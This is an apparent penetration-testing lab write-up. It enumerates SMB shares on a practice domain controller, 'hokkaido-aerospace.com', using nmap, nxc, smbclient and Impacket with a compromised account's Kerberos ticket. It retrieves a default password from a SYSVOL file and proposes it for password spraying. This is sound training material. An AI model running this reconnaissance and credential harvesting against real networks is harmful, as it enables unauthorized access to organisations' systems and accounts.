InfoSec LAB

Hokkaido_SMB

Created: 4 min read

SMB

Nmap discovered a Windows Directory service on the target ports 139 and 445

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ nmap --script smb-enum-shares -sV -p139,445 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-25 13:55 CEST
Nmap scan report for dc.hokkaido-aerospace.com (192.168.119.40)
Host is up (1.5s latency).
 
PORT    STATE SERVICE       VERSION
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.00 seconds

Share mapping failed

Null Session

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ nxc smb $IP -u '' -p '' --shares --interfaces
SMB         192.168.119.40  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB         192.168.119.40  445    DC               [+] hokkaido-aerospace.com\:
SMB         192.168.119.40  445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED

The target SMB server seems to allow guest access, but lack of privileges prevents enumerating shares

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ smbclient -L //$IP/
Password for [WORKGROUP\kali]:
Anonymous login successful
 
        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.119.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The target SMB server also allows anonymous access, but lack of privileges prevents enumerating shares

info Session

The info account has been compromised.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache FindDomainShare HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -check-access -check-admin
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Starting domain share enumeration at 2025-04-25 15:19:14
[*] Connecting to LDAP at DC
[*] LDAPS connection successful
[*] Found 2 computers in the domain
[*] No accessible shares found on LANSWEEPER
[*] Found 9 shares on dc.hokkaido-aerospace.com
[*] Enumeration completed in 0:00:02.747970. Found 9 shares.
 
Found 9 shares:
----------------------------------------------------------------------------------------------------
Computer                  Share           Type             Admin  Read  Write OS                   Remark                    
----------------------------------------------------------------------------------------------------
dc.hokkaido-aerospace.com ADMIN$          Unknown (Hidden) No     No    No    Windows Server 2022  Remote Admin              
dc.hokkaido-aerospace.com C$              Unknown (Hidden) No     No    No    Windows Server 2022  Default share             
dc.hokkaido-aerospace.com homes           Unknown          No     Yes   Yes   Windows Server 2022  user homes                
dc.hokkaido-aerospace.com IPC$            Disk (Hidden)    No     Yes   No    Windows Server 2022  Remote IPC                
dc.hokkaido-aerospace.com NETLOGON        Unknown          No     Yes   No    Windows Server 2022  Logon server share        
dc.hokkaido-aerospace.com SYSVOL          Unknown          No     Yes   No    Windows Server 2022  Logon server share        
dc.hokkaido-aerospace.com UpdateServicesP Unknown          No     Yes   No    Windows Server 2022  A network share to be used
dc.hokkaido-aerospace.com WsusContent     Unknown          No     Yes   No    Windows Server 2022  A network share to be used
dc.hokkaido-aerospace.com WSUSTemp        Unknown          No     No    No    Windows Server 2022  A network share used by Lo

Checking the target SMB server using FindDomainShare, there are several none default shares;

  • homes
  • UpdateServicesPackages
  • WsusContent
  • WSUSTemp

The presence of UpdateServicesPackages, WsusContent, and WSUSTemp suggests that the target system has WSUS installed.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-smbclient HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP                            
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Type help for list of commands
#

Session established

homes Share

# use homes
# ls
drw-rw-rw-          0  Fri Apr 25 15:18:57 2025 .
drw-rw-rw-          0  Fri Apr 25 15:06:29 2025 ..
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Angela.Davies
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Annette.Buckley
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Anthony.Anderson
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Catherine.Knight
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Charlene.Wallace
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Cheryl.Singh
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Deborah.Francis
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Declan.Woodward
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Elliott.Jones
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Gordon.Brown
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Grace.Lees
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Hannah.O'Neill
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Irene.Dean
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Julian.Davies
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Lynne.Tyler
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Molly.Edwards
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Rachel.Jones
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Sian.Gordon
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Tracy.Wood
drw-rw-rw-          0  Sat Nov 25 15:57:09 2023 Victor.Kelly
 
# tree
Finished - 20 files and folders

The homes share indeed includes home directories of the domain users Interestingly, they are all empty

SYSVOL Share

# use SYSVOL
# tree
/hokkaido-aerospace.com/DfsrPrivate
/hokkaido-aerospace.com/Policies
/hokkaido-aerospace.com/scripts
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
/hokkaido-aerospace.com/scripts/temp
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/USER
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER
/hokkaido-aerospace.com/scripts/temp/password_reset.txt
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Scripts
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Scripts
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Scripts/Shutdown
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Scripts/Startup
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Scripts/Shutdown
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Scripts/Startup
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/hokkaido-aerospace.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
/hokkaido-aerospace.com/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Finished - 29 files and folders

There is an interesting file; /hokkaido-aerospace.com/scripts/temp/password_reset.txt

password_reset.txt File

# cat /hokkaido-aerospace.com/scripts/temp/password_reset.txt
Initial Password: Start123!

The password_reset.txt file contains what appears to be a default password. This may be leveraged for another password spraying attack

UpdateServicesPackages Share

# use UpdateServicesPackages
# tree
Finished - 0 files and folders

Empty

WsusContent Share

# use WsusContent
# tree
/anonymousCheckFile.txt
Finished - 0 files and folders

anonymousCheckFile.txt

anonymousCheckFile.txt File

# cat anonymousCheckFile.txt

The anonymousCheckFile.txt file is empty

Interactive Graph View

Backlinks